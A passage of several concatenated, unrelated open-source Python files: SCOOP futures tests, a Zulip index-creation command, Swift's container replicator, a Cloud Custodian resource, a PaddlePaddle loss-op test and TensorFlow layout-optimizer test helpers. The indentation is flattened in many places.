len(_control.execQueue.inprogress),
len(_control.execQueue.ready),
len(_control.execQueue.movable),
len(_control.futureDict) - 1, # - 1 because the current function is a future too
]
def map_get_queues_size(n):
result = list(map(func4, [n for n in range(n)]))
return [
len(_control.execQueue.inprogress),
len(_control.execQueue.ready),
len(_control.execQueue.movable),
len(_control.futureDict) - 1, # - 1 because the current function is a future too
]
def port_ready(port, socket):
"""Checks if a given port is already binded"""
try:
socket.connect(('127.0.0.1', port))
except IOError:
return False
else:
socket.shutdown(2)
socket.close()
return True
class TestScoopCommon(unittest.TestCase):
def __init__(self, *args, **kwargs):
# Parent initialization
super(TestScoopCommon, self).__init__(*args, **kwargs)
def multiworker_set(self):
global subprocesses
worker = subprocess.Popen([sys.executable, "-m", "scoop.bootstrap.__main__",
"--brokerHostname", "127.0.0.1", "--taskPort", "5555",
"--metaPort", "5556", "tests.py"])
subprocesses.append(worker)
return worker
def setUp(self):
global subprocesses
import socket, datetime, time
# Start the server
self.server = subprocess.Popen([sys.executable, "-m", "scoop.broker.__main__",
"--tPort", "5555", "--mPort", "5556"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
begin = datetime.datetime.now()
while not port_ready(5555, s):
if (datetime.datetime.now() - begin > datetime.timedelta(seconds=3)):
raise Exception('Could not start server!')
subprocesses.append(self.server)
# Setup worker environment
scoop.IS_RUNNING = True
scoop.IS_ORIGIN = True
scoop.WORKER_NAME = 'origin'.encode()
scoop.BROKER_NAME = 'broker'.encode()
scoop.BROKER = BrokerInfo("127.0.0.1",
5555,
5556,
"127.0.0.1")
scoop.worker = (scoop.WORKER_NAME, scoop.BROKER_NAME)
scoop.MAIN_MODULE = "tests.py"
scoop.VALID = True
scoop.DEBUG = False
scoop.SIZE = 2
_control.execQueue = FutureQueue()
def tearDown(self):
global subprocesses
import socket, datetime, time
_control.execQueue.shutdown()
del _control.execQueue
_control.futureDict.clear()
        try:
            self.w.terminate()
            self.w.wait()
        except Exception:
            pass
        # Destroy the server
        if self.server.poll() is None:
            try:
                self.server.terminate()
                self.server.wait()
            except Exception:
                pass
# Stabilise zmq after a deleted socket
del subprocesses[:]
# Wait for the previous server to be correctly terminated
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
begin = datetime.datetime.now()
        while port_ready(5555, s):
            if datetime.datetime.now() - begin > datetime.timedelta(seconds=3):
                raise Exception('Could not terminate server!')
            time.sleep(0.1)
s.close()
class TestMultiFunction(TestScoopCommon):
def __init__(self, *args, **kwargs):
# Parent initialization
super(TestMultiFunction, self).__init__(*args, **kwargs)
self.main_func = main
self.small_result = 77
self.large_result = 76153
def test_small_uniworker(self):
_control.FutureQueue.highwatermark = 10
_control.FutureQueue.lowwatermark = 5
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
def test_small_no_lowwatermark_uniworker(self):
_control.FutureQueue.highwatermark = 9999999999999
_control.FutureQueue.lowwatermark = 1
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
def test_small_foreign_uniworker(self):
_control.FutureQueue.highwatermark = 1
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
def test_small_local_uniworker(self):
_control.FutureQueue.highwatermark = 9999999999999
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
def test_large_uniworker(self):
_control.FutureQueue.highwatermark = 9999999999999
result = futures._startup(self.main_func, 20)
self.assertEqual(result, self.large_result)
def test_large_no_lowwatermark_uniworker(self):
_control.FutureQueue.lowwatermark = 1
_control.FutureQueue.highwatermark = 9999999999999
result = futures._startup(self.main_func, 20)
self.assertEqual(result, self.large_result)
def test_large_foreign_uniworker(self):
_control.FutureQueue.highwatermark = 1
result = futures._startup(self.main_func, 20)
self.assertEqual(result, self.large_result)
def test_large_local_uniworker(self):
_control.FutureQueue.highwatermark = 9999999999999
result = futures._startup(self.main_func, 20)
self.assertEqual(result, self.large_result)
def test_small_local_multiworker(self):
self.w = self.multiworker_set()
_control.FutureQueue.highwatermark = 9999999999999
Backupenv = os.environ.copy()
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
os.environ = Backupenv
def test_small_foreign_multiworker(self):
self.w = self.multiworker_set()
_control.FutureQueue.highwatermark = 1
Backupenv = os.environ.copy()
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
os.environ = Backupenv
def test_execQueue_multiworker(self):
self.w = self.multiworker_set()
result = futures._startup(func0, 6)
self.assertEqual(len(_control.execQueue.inprogress), 0)
self.assertEqual(len(_control.execQueue.ready), 0)
self.assertEqual(len(_control.execQueue.movable), 0)
self.assertEqual(len(_control.futureDict), 0)
def test_execQueue_uniworker(self):
result = futures._startup(func0, 6)
self.assertEqual(len(_control.execQueue.inprogress), 0)
self.assertEqual(len(_control.execQueue.ready), 0)
self.assertEqual(len(_control.execQueue.movable), 0)
self.assertEqual(len(_control.futureDict), 0)
def test_execQueue_submit_uniworker(self):
result = futures._startup(submit_get_queues_size, 6)
self.assertEqual(
result,
[0 for _ in range(len(result))],
"Buffers are not empty after future completion"
)
def test_execQueue_map_uniworker(self):
result = futures._startup(map_get_queues_size, 6)
self.assertEqual(
result,
[0 for _ in range(len(result))],
"Buffers are not empty after future completion"
)
def test_execQueue_submit_multiworker(self):
self.w = self.multiworker_set()
result = futures._startup(submit_get_queues_size, 6)
self.assertEqual(
result,
[0 for _ in range(len(result))],
"Buffers are not empty after future completion"
)
def test_execQueue_map_multiworker(self):
self.w = self.multiworker_set()
result = futures._startup(map_get_queues_size, 6)
self.assertEqual(
result,
[0 for _ in range(len(result))],
"Buffers are not empty after future completion"
)
def test_partial(self):
"""This function removes some attributes (such as __name__)."""
from functools import partial
result = futures._startup(partial(self.main_func), 4)
self.assertEqual(result, self.small_result)
class TestSingleFunction(TestMultiFunction):
def __init__(self, *args, **kwargs):
# Parent initialization
super(TestSingleFunction, self).__init__(*args, **kwargs)
self.main_func = mainSimple
self.small_result = 30
self.large_result = 2870
class TestApi(TestScoopCommon):
    def __init__(self, *args, **kwargs):
        super(TestApi, self).__init__(*args, **kwargs)
def test_as_Completed_single(self):
result = futures._startup(funcCompleted, 30)
self.assertEqual(result, 9455)
def test_as_Completed_multi(self):
self.w = self.multiworker_set()
result = futures._startup(funcCompleted, 30)
self.assertEqual(result, 9455)
def test_map_single(self):
result = futures._startup(func3, 30)
self.assertEqual(result, 9455)
def test_map_multi(self):
self.w = self.multiworker_set()
result = futures._startup(func3, 30)
self.assertEqual(result, 9455)
def test_map_lambda(self):
self.w = self.multiworker_set()
result = futures._startup(funcLambda, 30)
self.assertEqual(result, 9455)
def test_submit_with_keyword(self):
result = futures._startup(funcKeywords, 2, kwarg=3.1415926)
self.assertEqual(result, { "kwarg": 3.1415926} )
# This test is complex to handle and has many implications
# Bundle a closure with the future?
# How to manage side-effects of variables in closure?
#def test_map_lambda_subfunc_not_global(self):
# self.w = self.multiworker_set()
# result = futures._startup(funcLambdaSubfuncNotGlobal, 30)
# self.assertEqual(result, 9455)
def test_map_imported_func(self):
self.w = self.multiworker_set()
result = futures._startup(funcCos)
self.assertGreater(result, 0.4)
self.assertLess(result, 0.5)
def test_submit_single(self):
result = futures._startup(funcSub, 10)
self.assertEqual(result, 100)
def test_submit_multi(self):
self.w = self.multiworker_set()
result = futures._startup(funcSub, 10)
self.assertEqual(result, 100)
def test_exception_single(self):
result = futures._startup(funcExcept, 19)
self.assertTrue(result)
def test_exception_multi(self):
self.w = self.multiworker_set()
result = futures._startup(funcExcept, 19)
self.assertTrue(result)
def test_done(self):
result = futures._startup(funcDone)
self.assertTrue(result)
def test_cancel(self):
self.assertTrue(futures._startup(funcCancel))
def test_callback(self):
self.assertTrue(futures._startup(funcCallback))
def test_wait_no_timeout(self):
done, not_done = futures._startup(funcWait, -1)
self.assertTrue(len(done) == 1000)
self.assertTrue(len(not_done) == 0)
def test_wait_with_timeout(self):
done, not_done = futures._startup(funcWait, 0.1)
self.assertTrue((len(done) + len(not_done)) == 1000)
def test_wait_nonblocking(self):
done, not_done = futures._startup(funcWait, 0)
self.assertTrue((len(done) + len(not_done)) == 1000)
def test_map_as_completed_single(self):
result = futures._startup(funcMapAsCompleted, 30)
self.assertEqual(result, 9455)
def test_map_as_completed_multi(self):
self.w = self.multiworker_set()
result = futures._startup(funcMapAsCompleted, 30)
self.assertEqual(result, 9455)
def test_from_generator_single(self):
result = futures._startup(funcIter, 30)
self.assertEqual(result, 9455)
def test_from_generator_multi(self):
self.w = self.multiworker_set()
result = futures._startup(funcIter, 30)
self.assertEqual(result, 9455)
class TestCoherent(TestScoopCommon):
    def __init__(self, *args, **kwargs):
        super(TestCoherent, self).__init__(*args, **kwargs)
def test_mapReduce(self):
result = futures._startup(funcMapReduce, [10, 20, 30])
self.assertEqual(result, 1400)
def test_doubleMapReduce(self):
result = futures._startup(funcDoubleMapReduce, [10, 20, 30])
self.assertTrue(result)
def test_mapScan(self):
result = futures._startup(funcMapScan, [10, 20, 30])
self.assertEqual(max(result), 1400)
class TestShared(TestScoopCommon):
    def __init__(self, *args, **kwargs):
        super(TestShared, self).__init__(*args, **kwargs)
    def test_shareConstant(self):
        result = futures._startup(funcSharedConstant)
        self.assertEqual(result, True)
    def test_shareFunction(self):
        result = futures._startup(funcSharedFunction)
        self.assertEqual(result, True)
if __name__ == '__main__' and os.environ.get('IS_ORIGIN', "1") == "1":
utSimple = unittest.TestLoader().loadTestsFromTestCase(TestSingleFunction)
utComplex = unittest.TestLoader().loadTestsFromTestCase(TestMultiFunction)
utApi = unittest.TestLoader().loadTestsFromTestCase(TestApi)
utUtils = unittest.TestLoader().loadTestsFromTestCase(TestUtils)
utCoherent = unittest.TestLoader().loadTestsFromTestCase(TestCoherent)
utShared = unittest.TestLoader().loadTestsFromTestCase(TestShared)
utStat = unittest.TestLoader().loadTestsFromTestCase(TestStat)
utStopWatch = unittest.TestLoader().loadTestsFromTestCase(TestStopWatch)
if len(sys.argv) > 1:
if sys.argv[1] == "simple":
unittest.TextTestRunner(verbosity=2).run(utSimple)
elif sys.argv[1] == "complex":
unittest.TextTestRunner(verbosity=2).run(utComplex)
elif sys.argv[1] == "api":
unittest.TextTestRunner(verbosity=2).run(utApi)
elif sys.argv[1] == "utils":
unittest.TextTestRunner(verbosity=2).run(utUtils)
elif sys.argv[1] == "coherent":
unittest.TextTestRunner(verbosity=2).run(utCoherent)
elif sys.argv[1] == "shared":
unittest.TextTestRunner(verbosity=2).run(utShared)
elif sys.argv[1] == "stat":
unittest.TextTestRunner(verbosity=2).run(utStat)
elif sys.argv[1] == "stopwatch":
unittest.TextTestRunner(verbosity=2).run(utStopWatch)
elif sys.argv[1] == "verbose":
sys.argv = sys.argv[0:1]
unittest.main(verbosity=2)
else:
unittest.main()
elif __name__ == '__main__':
futures._startup(mainSimple)
|
from typing import Any
from django.db import connection
from zerver.lib.management import ZulipBaseCommand
def create_indexes() -> None:
# Creating concurrent indexes is kind of a pain with current versions
# of Django/postgres, because you will get this error with seemingly
# reasonable code:
#
# CREATE INDEX CONCURRENTLY cannot be executed from a function or multi-command string
#
# For a lot more detail on this process, refer to the commit message
# that added this file to the repo.
with connection.cursor() as cursor:
# copied from 0082
print("Creating index zerver_usermessage_starred_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_starred_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 2) != 0;
''')
# copied from 0083
print("Creating index zerver_usermessage_mentioned_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_mentioned_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 8) != 0;
''')
# copied from 0095
print("Creating index zerver_usermessage_unread_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_unread_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 1) = 0;
''')
# copied from 0098
print("Creating index zerver_usermessage_has_alert_word_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_has_alert_word_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 512) != 0;
''')
# copied from 0099
print("Creating index zerver_usermessage_wildcard_mentioned_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_wildcard_mentioned_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 8) != 0 OR (flags & 16) != 0;
''')
# copied from 0177
print("Creating index zerver_usermessage_is_private_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_is_private_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 2048) != 0;
''')
# copied from 0180
print("Creating index zerver_usermessage_active_mobile_push_notification_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_active_mobile_push_notification_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 4096) != 0;
''')
print("Finished.")
class Command(ZulipBaseCommand):
help = """Create concurrent indexes for large tables."""
def handle(self, *args: Any, **options: str) -> None:
create_indexes()
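# A minimal sketch (illustrative, not part of the command) of how the bitmask
# predicates in the partial indexes above decode. The flag values are taken
# from the WHERE clauses above, not from zerver.models, so treat them as
# assumptions.
_INDEXED_FLAG_MASKS = {
    'starred': 2,
    'mentioned': 8,
    'unread': 1,  # indexed where (flags & 1) = 0, i.e. the read bit is unset
    'has_alert_word': 512,
    'is_private': 2048,
    'active_mobile_push_notification': 4096,
}

def _row_matches_starred_index(flags: int) -> bool:
    """Mirror of ``WHERE (flags & 2) != 0`` from the starred-message index."""
    return (flags & _INDEXED_FLAG_MASKS['starred']) != 0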
|
import os
import itertools
import json
import time
from collections import defaultdict
from eventlet import Timeout
from swift.container.sync_store import ContainerSyncStore
from swift.container.backend import ContainerBroker, DATADIR
from swift.container.reconciler import (
MISPLACED_OBJECTS_ACCOUNT, incorrect_policy_index,
get_reconciler_container_name, get_row_to_q_entry_translator)
from swift.common import db_replicator
from swift.common.storage_policy import POLICIES
from swift.common.exceptions import DeviceUnavailable
from swift.common.http import is_success
from swift.common.db import DatabaseAlreadyExists
from swift.common.utils import (Timestamp, hash_path,
storage_directory, majority_size)
class ContainerReplicator(db_replicator.Replicator):
server_type = 'container'
brokerclass = ContainerBroker
datadir = DATADIR
default_port = 6201
def report_up_to_date(self, full_info):
reported_key_map = {
'reported_put_timestamp': 'put_timestamp',
'reported_delete_timestamp': 'delete_timestamp',
'reported_bytes_used': 'bytes_used',
'reported_object_count': 'count',
}
for reported, value_key in reported_key_map.items():
if full_info[reported] != full_info[value_key]:
return False
return True
def _gather_sync_args(self, replication_info):
parent = super(ContainerReplicator, self)
sync_args = parent._gather_sync_args(replication_info)
if len(POLICIES) > 1:
sync_args += tuple(replication_info[k] for k in
('status_changed_at', 'count',
'storage_policy_index'))
return sync_args
def _handle_sync_response(self, node, response, info, broker, http,
different_region):
parent = super(ContainerReplicator, self)
if is_success(response.status):
remote_info = json.loads(response.data)
if incorrect_policy_index(info, remote_info):
status_changed_at = Timestamp(time.time())
broker.set_storage_policy_index(
remote_info['storage_policy_index'],
timestamp=status_changed_at.internal)
sync_timestamps = ('created_at', 'put_timestamp',
'delete_timestamp')
if any(info[key] != remote_info[key] for key in sync_timestamps):
broker.merge_timestamps(*(remote_info[key] for key in
sync_timestamps))
rv = parent._handle_sync_response(
node, response, info, broker, http, different_region)
return rv
def find_local_handoff_for_part(self, part):
"""
Look through devices in the ring for the first handoff device that was
identified during job creation as available on this node.
:returns: a node entry from the ring
"""
nodes = self.ring.get_part_nodes(part)
more_nodes = self.ring.get_more_nodes(part)
for node in itertools.chain(nodes, more_nodes):
if node['id'] in self._local_device_ids:
return node
return None
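    # Note: the search above visits the partition's primary nodes first and
    # only then falls back to ring.get_more_nodes(part), so a local primary
    # is always preferred over a pure handoff location.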
def get_reconciler_broker(self, timestamp):
"""
Get a local instance of the reconciler container broker that is
appropriate to enqueue the given timestamp.
:param timestamp: the timestamp of the row to be enqueued
:returns: a local reconciler broker
"""
container = get_reconciler_container_name(timestamp)
if self.reconciler_containers and \
container in self.reconciler_containers:
return self.reconciler_containers[container][1]
account = MISPLACED_OBJECTS_ACCOUNT
part = self.ring.get_part(account, container)
node = self.find_local_handoff_for_part(part)
if not node:
            raise DeviceUnavailable(
                'No mounted devices found suitable for handoff of reconciler '
                'container %s in partition %s' % (container, part))
hsh = hash_path(account, container)
db_dir = storage_directory(DATADIR, part, hsh)
db_path = os.path.join(self.root, node['device'], db_dir, hsh + '.db')
broker = ContainerBroker(db_path, account=account, container=container)
if not os.path.exists(broker.db_file):
try:
broker.initialize(timestamp, 0)
except DatabaseAlreadyExists:
pass
if self.reconciler_containers is not None:
self.reconciler_containers[container] = part, broker, node['id']
return broker
def feed_reconciler(self, container, item_list):
"""
Add queue entries for rows in item_list to the local reconciler
container database.
:param container: the name of the reconciler container
:param item_list: the list of rows to enqueue
:returns: True if successfully enqueued
"""
try:
reconciler = self.get_reconciler_broker(container)
except DeviceUnavailable as e:
self.logger.warning('DeviceUnavailable: %s', e)
return False
self.logger.debug('Adding %d objects to the reconciler at %s',
len(item_list), reconciler.db_file)
try:
reconciler.merge_items(item_list)
except (Exception, Timeout):
self.logger.exception('UNHANDLED EXCEPTION: trying to merge '
'%d items to reconciler container %s',
len(item_list), reconciler.db_file)
return False
return True
def dump_to_reconciler(self, broker, point):
"""
        Look for object rows for object updates in the wrong storage policy
        in broker with a ``ROWID`` greater than the rowid given as point.
:param broker: the container broker with misplaced objects
:param point: the last verified ``reconciler_sync_point``
:returns: the last successful enqueued rowid
"""
max_sync = broker.get_max_row()
misplaced = broker.get_misplaced_since(point, self.per_diff)
if not misplaced:
return max_sync
translator = get_row_to_q_entry_translator(broker)
errors = False
low_sync = point
while misplaced:
batches = defaultdict(list)
for item in misplaced:
container = get_reconciler_container_name(item['created_at'])
batches[container].append(translator(item))
for container, item_list in batches.items():
success = self.feed_reconciler(container, item_list)
if not success:
errors = True
point = misplaced[-1]['ROWID']
if not errors:
low_sync = point
misplaced = broker.get_misplaced_since(point, self.per_diff)
return low_sync
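    # Walk-through of the loop above: misplaced rows are pulled in batches of
    # self.per_diff, grouped per reconciler container by their created_at
    # timestamp, and enqueued batch by batch. low_sync only advances past a
    # batch once every container feed in it succeeded, so a failed enqueue is
    # retried on the next replication pass.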
def _post_replicate_hook(self, broker, info, responses):
if info['account'] == MISPLACED_OBJECTS_ACCOUNT:
return
try:
self.sync_store.update_sync_store(broker)
except Exception:
self.logger.exception('Failed to update sync_store %s' %
broker.db_file)
point = broker.get_reconciler_sync()
if not broker.has_multiple_policies() and info['max_row'] != point:
broker.update_reconciler_sync(info['max_row'])
return
max_sync = self.dump_to_reconciler(broker, point)
success = responses.count(True) >= majority_size(len(responses))
if max_sync > point and success:
# to be safe, only slide up the sync point with a majority on
# replication
broker.update_reconciler_sync(max_sync)
def delete_db(self, broker):
"""
Ensure that reconciler databases are only cleaned up at the end of the
replication run.
"""
if (self.reconciler_cleanups is not None and
broker.account == MISPLACED_OBJECTS_ACCOUNT):
# this container shouldn't be here, make sure it's cleaned up
self.reconciler_cleanups[broker.container] = broker
return
try:
# DB is going to get deleted. Be preemptive about it
self.sync_store.remove_synced_container(broker)
except Exception:
self.logger.exception('Failed to remove sync_store entry %s' %
broker.db_file)
return super(ContainerReplicator, self).delete_db(broker)
def replicate_reconcilers(self):
"""
Ensure any items merged to reconciler containers during replication
are pushed out to correct nodes and any reconciler containers that do
not belong on this node are removed.
"""
self.logger.info('Replicating %d reconciler containers',
len(self.reconciler_containers))
for part, reconciler, node_id in self.reconciler_containers.values():
self.cpool.spawn_n(
self._replicate_object, part, reconciler.db_file, node_id)
self.cpool.waitall()
        # wipe out the cache to disable the bypass in delete_db
cleanups = self.reconciler_cleanups
self.reconciler_cleanups = self.reconciler_containers = None
self.logger.info('Cleaning up %d reconciler containers',
len(cleanups))
for reconciler in cleanups.values():
self.cpool.spawn_n(self.delete_db, reconciler)
self.cpool.waitall()
self.logger.info('Finished reconciler replication')
def run_once(self, *args, **kwargs):
self.reconciler_containers = {}
self.reconciler_cleanups = {}
self.sync_store = ContainerSyncStore(self.root,
self.logger,
self.mount_check)
rv = super(ContainerReplicator, self).run_once(*args, **kwargs)
if any([self.reconciler_containers, self.reconciler_cleanups]):
self.replicate_reconcilers()
return rv
class ContainerReplicatorRpc(db_replicator.ReplicatorRpc):
def _parse_sync_args(self, args):
parent = super(ContainerReplicatorRpc, self)
remote_info = parent._parse_sync_args(args)
if len(args) > 9:
remote_info['status_changed_at'] = args[7]
remote_info['count'] = args[8]
remote_info['storage_policy_index'] = args[9]
return remote_info
def _get_synced_replication_info(self, broker, remote_info):
"""
Sync the remote_info storage_policy_index if needed and return the
newly synced replication info.
:param broker: the database broker
:param remote_info: the remote replication info
:returns: local broker replication info
"""
info = broker.get_replication_info()
if incorrect_policy_index(info, remote_info):
status_changed_at = Timestamp(time.time()).internal
broker.set_storage_policy_index(
remote_info['storage_policy_index'],
timestamp=status_changed_at)
info = broker.get_replication_info()
return info
|
from c7n.manager import resources
from c7n.query import QueryResourceManager
@resources.register('rest-api')
class RestAPI(QueryResourceManager):
resource_type = "aws.apigateway.restapis"
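# A minimal policy sketch (illustrative YAML, not part of this module) that
# exercises the resource registered above:
#
#   policies:
#     - name: list-rest-apis
#       resource: rest-api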
|
import unittest
import numpy as np
from op_test import OpTest
def smooth_l1_loss_forward(val, sigma2):
abs_val = abs(val)
if abs_val < 1.0 / sigma2:
return 0.5 * val * val * sigma2
else:
return abs_val - 0.5 / sigma2
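# The reference above is the standard smooth-L1 (Huber-style) loss with
# sigma2 = sigma ** 2:
#   loss(x) = 0.5 * sigma2 * x**2    if |x| < 1 / sigma2
#           = |x| - 0.5 / sigma2     otherwise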
class TestSmoothL1LossOp1(OpTest):
def setUp(self):
self.op_type = "smooth_l1_loss"
dims = (5, 10)
self.inputs = {
'X': np.random.random(dims).astype("float32"),
'Y': np.random.random(dims).astype("float32")
}
sigma = 3.0
self.attrs = {'sigma': sigma}
sigma2 = sigma * sigma
diff = self.inputs['X'] - self.inputs['Y']
loss = np.vectorize(smooth_l1_loss_forward)(diff, sigma2).sum(1)
loss = loss.reshape((dims[0], 1))
self.outputs = {
'Diff': diff.astype('float32'),
'Out': loss.astype('float32')
}
def test_check_output(self):
self.check_output()
def test_check_grad_normal(self):
self.check_grad(['X', 'Y'], 'Out', max_relative_error=0.02)
    def test_check_grad_ignore_x(self):
self.check_grad(
['Y'], 'Out', max_relative_error=0.03, no_grad_set=set("X"))
    def test_check_grad_ignore_y(self):
self.check_grad(
['X'], 'Out', max_relative_error=0.03, no_grad_set=set('Y'))
class TestSmoothL1LossOp2(OpTest):
def setUp(self):
self.op_type = "smooth_l1_loss"
dims = (5, 10)
self.inputs = {
'X': np.random.random(dims).astype("float32"),
'Y': np.random.random(dims).astype("float32"),
'InsideWeight': np.random.random(dims).astype("float32"),
'OutsideWeight': np.random.random(dims).astype("float32")
}
sigma = 3.0
self.attrs = {'sigma': sigma}
sigma2 = sigma * sigma
diff = self.inputs['X'] - self.inputs['Y']
diff = diff * self.inputs['InsideWeight']
loss = np.vectorize(smooth_l1_loss_forward)(diff, sigma2)
loss = loss * self.inputs['OutsideWeight']
loss = loss.sum(1).reshape((dims[0], 1))
self.outputs = {
'Diff': diff.astype('float32'),
'Out': loss.astype('float32')
}
def test_check_output(self):
self.check_output()
def test_check_grad_normal(self):
self.check_grad(['X', 'Y'], 'Out', max_relative_error=0.03)
    def test_check_grad_ignore_x(self):
self.check_grad(
['Y'],
'Out',
max_relative_error=0.03,
no_grad_set=set(['X', 'InsideWeight', 'OutsideWeight']))
    def test_check_grad_ignore_y(self):
self.check_grad(
['X'],
'Out',
max_relative_error=0.03,
no_grad_set=set(['Y', 'InsideWeight', 'OutsideWeight']))
if __name__ == '__main__':
unittest.main()
|
"""Tests for Grappler LayoutOptimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import device_properties_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.grappler import cluster as gcluster
from tensorflow.python.grappler import tf_optimizer
from tensorflow.python.layers import convolutional as conv_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import saver as saver_lib
def _weight(shape):
"""Generates a weight of a given shape."""
return random_ops.truncated_normal(shape, seed=0, stddev=0.1)
def _bias(shape):
"""Generates a bias of a given shape."""
return constant_op.constant(0.1, shape=shape)
def _conv2d(x, w):
"""Returns a 2d convolution layer with full stride."""
return nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')
def _max_pool_2x2(x):
"""Downsamples a feature map by 2X."""
return nn.max_pool(
x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def _two_layer_model(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
b_conv1 = _bias([32])
h_conv1 = nn.relu(_conv2d(x_image, w_conv1) + b_conv1)
h_pool1 = _max_pool_2x2(h_conv1)
w_conv2 = _weight([5, 5, 32, 64])
b_conv2 = _bias([64])
h_conv2 = nn.relu(_conv2d(h_pool1, w_conv2) + b_conv2)
h_pool2 = _max_pool_2x2(h_conv2)
return h_pool2
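# Shape walk-through for _two_layer_model, assuming the 28x28 reshape above:
# [-1, 28, 28, 1] -> conv 5x5x32 -> pool -> [-1, 14, 14, 32]
# -> conv 5x5x64 -> pool -> [-1, 7, 7, 64] (SAME padding, stride-2 pools).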
def _model_with_second_port():
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([2, 5, 5, 4], seed=0)
scale = constant_op.constant(0.1, shape=[4])
offset = constant_op.constant(0.3, shape=[4])
y, mean, _ = nn.fused_batch_norm(x, scale, offset)
  add = math_ops.add(y, mean)
  output = array_ops.identity(add)
return output
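# "Second port" presumably refers to the second output of fused_batch_norm:
# adding y (output port 0) to mean (output port 1) makes the graph consume a
# non-primary output, which this fixture appears meant to exercise.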
def _model_with_branch(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
w_conv2 = _weight([5, 5, 1, 32])
c_conv1 = _conv2d(x_image, w_conv1)
c_conv2 = _conv2d(x_image, w_conv2)
add = math_ops.add(c_conv1, c_conv2)
return add
def _model_with_vec_and_4d(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
c_conv1 = _conv2d(x_image, w_conv1)
vector = constant_op.constant(6.4, shape=[32])
add = math_ops.add(c_conv1, vector)
return add
def _loop():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(_two_layer_model, elems, dtype=dtypes.float32)
return outputs
def _loop_with_branch():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(
_model_with_branch, elems, dtype=dtypes.float32)
return outputs
def _loop_with_vec_and_4d():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(
_model_with_vec_and_4d, elems, dtype=dtypes.float32)
return outputs
def _get_config(layout_optimizer=True):
if layout_optimizer:
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON,
# do not remove duplicated nodes
arithmetic_optimization=rewriter_config_pb2.RewriterConfig.OFF)
else:
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.OFF,
# do not remove duplicated nodes
arithmetic_optimization=rewriter_config_pb2.RewriterConfig.OFF)
rewrite_options.min_graph_nodes = -1
graph_options = config_pb2.GraphOptions(
rewrite_options=rewrite_options, build_cost_model=1)
config = config_pb2.ConfigProto(graph_options=graph_options)
config.graph_options.optimizer_options.opt_level = -1
return config
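# build_cost_model=1 asks the session to populate RunMetadata.cost_graph,
# which the tests below inspect to count the Transpose/VecPermute nodes
# inserted by the layout optimizer.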
def _simple_metagraph(depthwise=False):
random_seed.set_random_seed(0)
x = variables.Variable(random_ops.truncated_normal([1, 200, 200, 3], seed=0))
conv = conv_layers.separable_conv2d if depthwise else conv_layers.conv2d
y = conv(x, 32, [3, 3])
z = conv(y, 32, [3, 3])
optimizer = gradient_descent.GradientDescentOptimizer(1e-4)
loss = math_ops.reduce_mean(z)
train_op = optimizer.minimize(loss)
graph = ops.get_default_graph()
graph.add_to_collection('train_op', train_op)
